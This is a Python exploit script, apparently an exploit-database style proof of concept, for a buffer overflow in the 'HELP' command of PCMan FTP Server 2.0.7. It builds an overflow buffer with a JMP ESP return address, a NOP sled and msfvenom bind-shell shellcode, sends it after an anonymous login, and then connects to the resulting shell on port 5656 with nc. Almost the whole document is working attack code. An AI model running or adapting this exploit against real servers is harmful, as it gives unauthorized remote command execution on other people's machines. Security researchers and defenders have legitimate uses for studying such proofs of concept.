#!/usr/bin/env python #-*- coding: utf-8 -*- # Exploit Title: PCMan FTP Server 2.0.7 - 'HELP' Command Buffer Overflow # Date: 07/11/2016 # Author: Yunus YILDIRIM (Th3GundY) # Team: CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com # Website: http://yildirimyunus.com # Contact: yunusyildirim@protonmail.com # Tested on: Windows 7 Ultimate 32Bit import socket import sys import os import time def banner(): banner = "\n\n" banner +=" aaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaa aaaaaaa \n" banner +=" aaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \n" banner +=" aaa aaaaaaaaa aaaaa aaaaaa aaaaaaaaaaaaaaaaa \n" banner +=" aaa aaaaaaaaaaaaaa aaaaaa aaaaaaaaaaaaaaaaa \n" banner +=" aaaaaaaa aaa aaaaaaaaaaaaaaaaaaa aaaaaaaaaaaa \n" banner +=" aaaaaaa aaa aaaaaaaaaaaaaaaaaaa aaa aaaaaaa \n" banner +=" \n" print banner def exploit(target, port): eip = "\xC3\x9C\xB4\x76" #SHELL32.dll 76B49CC3 JMP ESP # msfvenom -p windows/shell_bind_tcp LPORT=5656 -b '\x00\x0a\x0d\xff' -f c shellcode = ("\xdb\xcf\xd9\x74\x24\xf4\xba\x9f\xef\x1b\x27\x5e\x29\xc9\xb1" "\x53\x31\x56\x17\x03\x56\x17\x83\x59\xeb\xf9\xd2\x99\x1c\x7f" "\x1c\x61\xdd\xe0\x94\x84\xec\x20\xc2\xcd\x5f\x91\x80\x83\x53" "\x5a\xc4\x37\xe7\x2e\xc1\x38\x40\x84\x37\x77\x51\xb5\x04\x16" "\xd1\xc4\x58\xf8\xe8\x06\xad\xf9\x2d\x7a\x5c\xab\xe6\xf0\xf3" "\x5b\x82\x4d\xc8\xd0\xd8\x40\x48\x05\xa8\x63\x79\x98\xa2\x3d" "\x59\x1b\x66\x36\xd0\x03\x6b\x73\xaa\xb8\x5f\x0f\x2d\x68\xae" "\xf0\x82\x55\x1e\x03\xda\x92\x99\xfc\xa9\xea\xd9\x81\xa9\x29" "\xa3\x5d\x3f\xa9\x03\x15\xe7\x15\xb5\xfa\x7e\xde\xb9\xb7\xf5" "\xb8\xdd\x46\xd9\xb3\xda\xc3\xdc\x13\x6b\x97\xfa\xb7\x37\x43" "\x62\xee\x9d\x22\x9b\xf0\x7d\x9a\x39\x7b\x93\xcf\x33\x26\xfc" "\x3c\x7e\xd8\xfc\x2a\x09\xab\xce\xf5\xa1\x23\x63\x7d\x6c\xb4" "\x84\x54\xc8\x2a\x7b\x57\x29\x63\xb8\x03\x79\x1b\x69\x2c\x12" "\xdb\x96\xf9\x8f\xd3\x31\x52\xb2\x1e\x81\x02\x72\xb0\x6a\x49" "\x7d\xef\x8b\x72\x57\x98\x24\x8f\x58\xb0\xac\x06\xbe\xd6\xdc" "\x4e\x68\x4e\x1f\xb5\xa1\xe9\x60\x9f\x99\x9d\x29\xc9\x1e\xa2" "\xa9\xdf\x08\x34\x22\x0c\x8d\x25\x35\x19\xa5\x32\xa2\xd7\x24" "\x71\x52\xe7\x6c\xe1\xf7\x7a\xeb\xf1\x7e\x67\xa4\xa6\xd7\x59" "\xbd\x22\xca\xc0\x17\x50\x17\x94\x50\xd0\xcc\x65\x5e\xd9\x81" "\xd2\x44\xc9\x5f\xda\xc0\xbd\x0f\x8d\x9e\x6b\xf6\x67\x51\xc5" "\xa0\xd4\x3b\x81\x35\x17\xfc\xd7\x39\x72\x8a\x37\x8b\x2b\xcb" "\x48\x24\xbc\xdb\x31\x58\x5c\x23\xe8\xd8\x6c\x6e\xb0\x49\xe5" "\x37\x21\xc8\x68\xc8\x9c\x0f\x95\x4b\x14\xf0\x62\x53\x5d\xf5" "\x2f\xd3\x8e\x87\x20\xb6\xb0\x34\x40\x93") buffer = 'A'*2006 + eip + "\x90"*21 + shellcode try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target,port)) s.recv(1024) print "[+] Connect to %s on port %d" % (target,port) except Exception, e: print "[-] Could not create socket", e.message sys.exit(0) try: s.send('USER anonymous\r\n') s.recv(1024) s.send('PASS CT-Zer0\r\n') s.recv(1024) s.send('HELP ' + buffer + '\r\n') print "[+] Exploit Sent Successfully" s.close() print '[+] You got bind shell on port 5656\n' time.sleep(2) os.system('nc ' + target + ' 5656') except: print "[-] Could not connect to target" if len(sys.argv) == 3: banner() target = sys.argv[1] port = int(sys.argv[2]) exploit(target, port) else: banner() print "[*] Usage: python %s <IP> <Port>\n" % sys.argv[0] sys.exit(0)